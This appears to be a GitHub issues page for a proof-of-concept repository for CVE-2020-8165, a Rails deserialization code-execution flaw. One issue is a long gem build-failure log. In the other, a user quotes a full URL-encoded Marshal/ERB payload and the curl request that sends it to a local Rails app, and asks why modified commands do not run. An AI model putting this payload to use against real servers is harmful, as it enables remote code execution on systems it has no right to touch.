masahiro331 / cve-2020-8165 Goto Github PK

I tried to install and received the following error message:
Gem::Ext::BuildError: ERROR: Failed to build gem native extension.

current directory:
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb
extconf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.

Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in try_do': The compiler failed to generate an executable file. (RuntimeError) You have to install development tools first. from /usr/lib/ruby/2.7.0/mkmf.rb:597:in block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in with_werror' from /usr/lib/ruby/2.7.0/mkmf.rb:597:in try_compile'
from extconf.rb:138:in nokogiri_try_compile' from extconf.rb:162:in block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in with_cflags' from extconf.rb:161:in add_cflags'
from extconf.rb:416:in `

To see why this extension failed to compile, please check the mkmf.log which can
be found here:

/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/mkmf.log

extconf failed, exit code 1

Gem files will remain installed in
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokogiri-1.10.9 for
inspection.
Results logged to
/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7.0/nokogiri-1.10.9/gem_make.out

An error occurred while installing nokogiri (1.10.9), and Bundler
cannot continue.
Make sure that gem install nokogiri -v '1.10.9' --source 'https://rubygems.org/' succeeds before bundling.

In Gemfile:
rails was resolved to 5.2.3, which depends on
actioncable was resolved to 5.2.3, which depends on
actionpack was resolved to 5.2.3, which depends on
actionview was resolved to 5.2.3, which depends on
rails-dom-testing was resolved to 2.0.3, which depends on
nokogiri

gem_make.out OUTPUT:

current directory: /root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/gems/nokog
iri-1.10.9/ext/nokogiri
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20201130-4800-ae9ah6.rb ext
conf.rb
checking if the C compiler accepts ... *** extconf.rb failed ***
Could not create Makefile due to some reason, probably lack of necessary
libraries and/or headers. Check the mkmf.log file for more details. You may
need configuration options.

Provided configuration options:
--with-opt-dir
--without-opt-dir
--with-opt-include
--without-opt-include=${opt-dir}/include
--with-opt-lib
--without-opt-lib=${opt-dir}/lib
--with-make-prog
--without-make-prog
--srcdir=.
--curdir
--ruby=/usr/bin/$(RUBY_BASE_NAME)2.7
--help
--clean
/usr/lib/ruby/2.7.0/mkmf.rb:471:in try_do': The compiler failed to generate an executable file. (RuntimeError) You have to install development tools first. from /usr/lib/ruby/2.7.0/mkmf.rb:597:in block in try_compile'
from /usr/lib/ruby/2.7.0/mkmf.rb:544:in with_werror' from /usr/lib/ruby/2.7.0/mkmf.rb:597:in try_compile'
from extconf.rb:138:in nokogiri_try_compile' from extconf.rb:162:in block in add_cflags'
from /usr/lib/ruby/2.7.0/mkmf.rb:655:in with_cflags' from extconf.rb:161:in add_cflags'
from extconf.rb:416:in `

To see why this extension failed to compile, please check the mkmf.log which can
be found here:

/root/Tools/CVE-2020-8165/vendor/bundle/ruby/2.7.0/extensions/x86_64-linux/2.7
.0/nokogiri-1.10.9/mkmf.log

extconf failed, exit code 1

mkmf.log OUTPUT:

"x86_64-linux-gnu-gcc -o conftest -I/usr/include/x86_64-linux-gnu/ruby-2.7.0 -I/
usr/include/ruby-2.7.0/ruby/backward -I/usr/include/ruby-2.7.0 -I. -Wdate-time -
D_FORTIFY_SOURCE=2 -g -O2 -fdebug-prefix-map=/build/ruby2.7-PnoFQD/ruby2.7-2.7
.2=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC conftest.c
-L. -L/usr/lib/x86_64-linux-gnu -L. -Wl,-z,relro -Wl,-z,now -fstack-protector-
strong -rdynamic -Wl,-export-dynamic -lruby-2.7 -lm -lc "
checked program was:
/* begin */
1: #include "ruby.h"
2:
3: int main(int argc, char *argv)
4: {
5: return !!argv[argc];
6: }
/ end */

Any assistance would be appreciated.

Hi,

I am able to use the provided exploit code to create the /tmp/rce file, by running the curl command twice.
However, I cannot modify the code to create other files or run other commands.

I changed the code touch /tmp/rce to touch /tmp/rce2 and ran the rest of the Ruby code in the same way.

From this, I generated the payload %04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T

And ran the request curl 'localhost:3000/users?new=%04%08o%3A%40ActiveSupport%3A%3ADeprecation%3A%3ADeprecatedInstanceVariableProxy%09%3A%0E%40instanceo%3A%08ERB%08%3A%09%40srcI%22%16%60touch+%2Ftmp%2Frce2%60%06%3A%06ET%3A%0E%40filenameI%22%061%06%3B%09T%3A%0C%40linenoi%06%3A%0C%40method%3A%0Bresult%3A%09%40varI%22%0C%40result%06%3B%09T%3A%10%40deprecatorIu%3A%1FActiveSupport%3A%3ADeprecation%00%06%3B%09T' twice.

However, this did not create a new file /tmp/rce2. I am also not able to successfully run any other commands, such as rm, echo 'x' > /tmp/rce, or ping.

Do you have any advice on why this is not working?

Thank you!